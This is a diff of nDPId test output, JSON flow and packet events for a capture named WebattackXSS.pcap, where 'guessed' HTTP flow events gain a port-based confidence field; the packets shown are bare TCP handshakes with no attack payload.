-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347403327,"flow_last_seen":1499347408726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347527181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56818,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347403327,"flow_last_seen":1499347408726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347527181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56818,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347403327,"flow_last_seen":1499347408726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347527181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56818,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347404575,"flow_last_seen":1499347409726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347527181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56832,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347404575,"flow_last_seen":1499347409726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347527181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56832,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347404575,"flow_last_seen":1499347409726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347527181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56832,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4666,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347527425,"flow_last_seen":1499347527425,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347527425,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4666,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":330,"flow_packet_id":1,"flow_last_seen":1499347527425,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347527425,"pkt":"ABm5CmnxAMGxFOsxCABFAAA84vtAAD4G4tSsEAABwKgKMuMgAFAAyeh3AAAAAKACchCGiwAAAgQFtAQCCAoBOwqMAAAAAAEDAwc="}
@@ -1852,17 +1852,17 @@
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4743,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":335,"flow_packet_id":1,"flow_last_seen":1499347536332,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347536332,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iGJAAD4GPW6sEAABwKgKMuN+AFBSPZtdAAAAAKACchB5IAAAAgQFtAQCCAoBOxM\/AAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4744,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":335,"flow_packet_id":2,"flow_last_seen":1499347536332,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347536332,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ434l0Xf0Uj2bXqAScSDzoAAAAgQFtAQCCAoD5OS0ATsTPwEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4745,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":335,"flow_packet_id":3,"flow_last_seen":1499347536333,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347536333,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iGNAAD4GPXWsEAABwKgKMuN+AFBSPZteJdF39YAQAOWSqAAAAQEICgE7Ez8D5OS0"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347412160,"flow_last_seen":1499347417729,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347537346,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56912,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347412160,"flow_last_seen":1499347417729,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347537346,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56912,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347412160,"flow_last_seen":1499347417729,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347537346,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56912,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347413405,"flow_last_seen":1499347418729,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347537346,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56926,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347413405,"flow_last_seen":1499347418729,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347537346,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56926,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347413405,"flow_last_seen":1499347418729,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347537346,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56926,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347414709,"flow_last_seen":1499347419729,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347537346,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56940,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347414709,"flow_last_seen":1499347419729,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347537346,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56940,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347414709,"flow_last_seen":1499347419729,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347537346,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347407100,"flow_last_seen":1499347412728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347537346,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56858,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347407100,"flow_last_seen":1499347412728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347537346,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56858,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347407100,"flow_last_seen":1499347412728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347537346,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56858,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347408367,"flow_last_seen":1499347413728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347537346,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56872,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347408367,"flow_last_seen":1499347413728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347537346,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56872,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347408367,"flow_last_seen":1499347413728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347537346,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56872,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347409644,"flow_last_seen":1499347414728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347537346,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56886,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347409644,"flow_last_seen":1499347414728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347537346,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56886,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347409644,"flow_last_seen":1499347414728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347537346,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56886,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4755,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347537591,"flow_last_seen":1499347537591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347537591,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4755,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":336,"flow_packet_id":1,"flow_last_seen":1499347537591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347537591,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UmRAAD4Gc2ysEAABwKgKMuOMAFC1fUYeAAAAAKACchBp1gAAAgQFtAQCCAoBOxR6AAAAAAEDAwc="}
@@ -1888,17 +1888,17 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4827,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":341,"flow_packet_id":1,"flow_last_seen":1499347546427,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347546427,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Q6tAAD4GgiWsEAABwKgKMuPqAFBqhV6wAAAAAKACchCTPQAAAgQFtAQCCAoBOx0bAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4828,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":341,"flow_packet_id":2,"flow_last_seen":1499347546428,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347546428,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4+qNxgXIaoVesaAScSAOGQAAAgQFtAQCCAoD5O6QATsdGwEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4829,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":341,"flow_packet_id":3,"flow_last_seen":1499347546428,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347546428,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Q6xAAD4GgiysEAABwKgKMuPqAFBqhV6xjcYFyYAQAOWtIAAAAQEICgE7HRsD5O6Q"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347417243,"flow_last_seen":1499347422731,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347547452,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56966,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347417243,"flow_last_seen":1499347422731,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347547452,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56966,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347417243,"flow_last_seen":1499347422731,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347547452,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56966,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347418519,"flow_last_seen":1499347423606,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347547452,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56980,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347418519,"flow_last_seen":1499347423606,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347547452,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56980,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347418519,"flow_last_seen":1499347423606,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347547452,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56980,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347421069,"flow_last_seen":1499347426732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347547452,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57008,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347421069,"flow_last_seen":1499347426732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347547452,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57008,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347421069,"flow_last_seen":1499347426732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347547452,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57008,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347422332,"flow_last_seen":1499347427732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347547452,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57022,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347422332,"flow_last_seen":1499347427732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347547452,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57022,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
